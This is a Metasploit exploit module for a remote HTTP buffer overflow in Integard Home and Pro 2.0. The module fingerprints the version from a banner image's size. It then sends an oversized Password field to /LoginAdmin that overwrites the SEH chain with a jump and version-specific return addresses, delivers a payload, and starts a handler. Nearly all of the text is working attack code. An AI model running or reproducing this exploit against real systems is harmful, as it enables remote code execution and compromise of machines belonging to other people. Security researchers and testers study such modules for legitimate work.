Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit



class Metasploit3 < Msf::Exploit::Remote


    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Integard Home/Pro version 2.0',
            'Description'    => %q{
                    Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
            },
            'Author'  =>
                [
                    'Lincoln',
                    'Nullthreat',
                    'rick2600',
                    'corelanc0d3r' 
                ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision: $',
            'References'    =>
                [
                    ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
                    'StackAdjustment' => -1500,
                },
            'Platform'       => 'win',
            'Privileged'     => false,
            'Targets'        =>
                [
                    [ 'Automatic Targeting',          { 'auto' => true }],
                    [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
                    [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
                ],
            'DefaultTarget'  => 0))

        register_options(
            [
                Opt::RPORT(18881)
            ], self.class )
    end


    def exploit
        mytarget = target
        continueattack=true
        if(target['auto'])
            mytarget = nil
            print_status("[*] Automatically detecting the target...")
            connect
            response = send_request_raw(
            {'uri' => '/banner.jpg', 
            'version' => '1.1', 
            'method' => 'GET'
            }, 5)
            contlength = response['Content-Length']
            if (contlength == "24584")
                print_status("[!] Found Version - Integard Home")
                mytarget = self.targets[1]
            elsif (contlength == "23196")
                print_status("[!] Found Version - Integard Pro")
                mytarget = self.targets[2]
            else
                print_status("[-] Unknown Version")
                continueattack=false
            end
            disconnect
        end
        if continueattack
            print_status("[!] Selected Target: #{mytarget.name}")
            print_status("[*] Building Buffer")
            pay = payload.encoded
            junk = rand_text_alpha_upper(3091 - pay.length)
            jmp = "\xE9\x2B\xF8\xFF\xFF"
            nseh = "\xEB\xF9\x90\x90"
            seh = [mytarget.ret].pack('V')
            buffer = junk + pay + jmp + nseh + seh
            print_status("[*] Sending Request")
            post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
            req = "/LoginAdmin"
            connect
            send_request_raw({
                'uri' => req,
                'version' => '1.1',
                'method' => 'POST',
                'headers' => 
                    {
                    'Host' => '192.168.1.1:18881',
                    'Content-Length' => 1074
                    },
                'data' => post_data
                }, 5)
            print_status("[*] Request Sent")
            handler
        end
    end
end